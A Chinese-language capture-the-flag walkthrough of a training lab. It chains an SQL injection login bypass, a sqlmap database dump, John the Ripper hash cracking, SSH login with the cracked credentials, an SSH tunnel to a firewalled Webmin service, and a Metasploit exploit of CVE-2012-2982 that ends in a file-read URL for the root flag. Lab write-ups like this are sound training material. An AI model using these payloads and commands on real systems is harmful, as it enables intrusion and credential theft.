Task 1 Deploy the vulnerable machine
大卡通头像叫什么名
一眼杀手47 agent 47
Task 2 Obtain access via SQLi
输入用户名' or 1=1 -- - 密码空着就可以进入到后台
不懂的去学sql注入
登入成功后跳转到一个查询页面portal.php
Task 3 Using SQLMap
在查询页面随便搜索一下然后进行抓包,然后在burp里右键抓到的包保存
sqlmap -r request.txt --dbms=mysql --dump -r 使用您之前保存的截获请求 --dbms 告诉 SQLMap 它是什么类型的数据库管理系统 --dump 尝试输出整个数据库
然后就会跑出来这个东西
这个是user表,另外一个是post表
Task 4 Cracking a password with JohnTheRipper
安装JohnTheRipper后,可以使用以下参数针对哈希运行它:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
hash.txt - 包含您的哈希列表(在当前情况下,它只有 1 个哈希)--wordlist 是您用来查找去哈希值的单词列表 --format 是使用的哈希算法。此题它使用 SHA256 进行哈希处理。
其实这个值我们在跑数据库的时候也跑出来了
What is the user flag?
现在我们有了有密码和用户名(agent47) 可以尝试去ssh登入
ssh agent47@10.10.5.75 密码 videogamer124
Task 5 Exposing services with reverse SSH tunnels
反向 SSH 端口转发指定将远程服务器主机上的给定端口转发到本地端的给定主机和端口。 -L 是一个本地隧道(你< - 客户端)。 如果站点被阻止,您可以将流量转发到您拥有的服务器并查看它。 例如,如果 imgur 在工作中被阻止,您可以执行 ssh -L 9000:imgur.com:80 user@example.com .转到 localhost:9000 您的机器上,将使用您的其他服务器加载 imgur 流量。 -R 是一个远程隧道(你 –>客户端)您将流量转发到其他服务器供其他人查看。与上面的例子类似,但相反。
如果我们运行 ss -tulpn 它会告诉我们正在运行哪些套接字连接
| Argument 论点 | Description 描述 |
|---|---|
-t |
Display TCP sockets 显示 TCP 套接字 |
-u |
Display UDP sockets 显示 UDP 套接字 |
-l |
Displays only listening sockets 仅显示侦听套接字 |
-p |
Shows the process using the socket 显示使用套接字的进程 |
-n |
Doesn’t resolve service names 不解析服务名称 |
我们可以看到在端口 10000 上运行的服务通过外部防火墙规则被阻止。但是,使用 SSH 隧道,我们可以向我们公开端口
从我们的本地计算机,运行 ssh -L 10000:localhost:10000 <username>@<ip>
ssh -L 10000:127.0.0.1:10000 agent47@10.10.5.75
然后我们本地访问localhost:10000
然后利用上面的账号密码即可登入成功
所以cms是webmin,版本1.580
Task 6 Privilege Escalation with Metasploit
搜索发现CVE是CVE-2012-2982
那我们直接打开msfconsole,搜索该cve
然后一些参数,因为10000端口已经转发到我们计算机上的端口 上了,所以RHOSTS填127.0.0.1 LHOST还是vpn那个IP
当然也可以在我们10000端口上直接利用漏洞
http://localhost:10000/file/show.cgi/root/root.txt